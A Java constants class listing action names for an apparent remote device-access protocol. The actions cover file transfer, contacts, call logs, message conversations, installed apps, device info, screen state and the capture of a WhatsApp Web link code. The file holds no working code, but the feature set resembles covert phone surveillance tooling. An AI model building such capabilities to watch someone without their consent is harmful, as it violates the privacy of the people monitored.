package com.user.side.constants;

public class Actions {
    public final static String ACTION_GET_STATE = "action_get_state";
    public final static String ACTION_RECEIVE_STATE = "action_receive_state";
    public final static String ACTION_START_SESSION = "action_start_session";
    public static final String ACTION_SESSION_CREATED = "action_session_created";
    public static final String ACTION_RECEIVE_FILE = "action_receive_file";
    public static final String ACTION_FILE_CHANGE = "action_file_change";
    public static final String ACTION_REQUEST_FILE_LIST = "action_request_file_list";
    public static final String ACTION_REQUEST_FILE_REMOVE = "action_request_file_remove";
    public static final String ACTION_REQUEST_FILE_RENAME = "action_request_file_rename";
    public static final String ACTION_FILE_ERROR = "action_file_error";
    public static final String ACTION_CLOSE_SESSION = "close_session";
    public static final String ACTION_REQUEST_DOWNLOAD_FILE = "request_file_download";
    public static final String ACTION_FILE_TRANSFER_STARTED = "file_transfer_started";
    public static final String ACTION_RECEIVE_FILE_CHUNK = "receive_file_chunk";
    public static final String ACTION_FILE_TRANSFER_COMPLETED = "file_transfer_completed";
    public static final String ACTION_CHUCK_RECEIVED = "chunk_received";
    public static final String ACTION_REQUEST_CONTACTS = "request_contacts";
    public static final String ACTION_RECEIVE_CONTACT = "receive_contact";
    public static final String  ACTION_REQUEST_START_WHATSAPP_WEB_SESSION = "request_start_whatsapp_web_session";
    public static final String ACTION_RECEIVE_WHATSAPP_LINK_CODE = "receive_whatsapp_link_code";
    public static final String ACTION_REQUEST_GET_DEVICE_NUMBERS = "request_get_device_numbers";
    public static final String ACTION_RECEIVE_DEVICE_NUMBERS = "receive_device_numbers";
    public static final String ACTION_FILE_RECEIVED = "file_received";
    public static final String ACTION_FAILED_TO_START_WHATSAPP_WEB_SESSION = "failed_to_start_whatsapp_web_session";
    public static final String ACTION_GET_SCREEN_STATE = "get_screen_state";
    public static final String ACTION_RECEIVE_SCREEN_STATE = "receive_screen_state";
    public static final String ACTION_RECEIVE_CONVERSATION = "receive_conversation";
    public static final String ACTION_REQUEST_GET_CONVERSATIONS = "request_get_conversations";
    public static final String ACTION_REQUEST_GET_CONVERSATION = "request_get_conversation";
    public static final String ACTION_RECEIVE_CONVERSATION_MESSAGE = "receive_conversation_message";
    public static final String ACTION_REQUEST_GET_CALL_LOGS = "request_get_call_logs";
    public static final String ACTION_RECEIVE_CALL_LOG = "receive_call_log";
    public static final String ACTION_RECEIVE_INSTALLED_APP = "receive_installed_app";
    public static final String ACTION_REQUEST_GET_INSTALLED_APPS = "request_get_installed_apps";
    public static final String ACTION_REQUEST_GET_DEVICE_INFO = "request_get_device_info";
    public static final String ACTION_RECEIVE_DEVICE_INFO = "receive_device_info";
    public static final String ACTION_READY_TO_START_PROCESS = "ready_to_start_process";
}
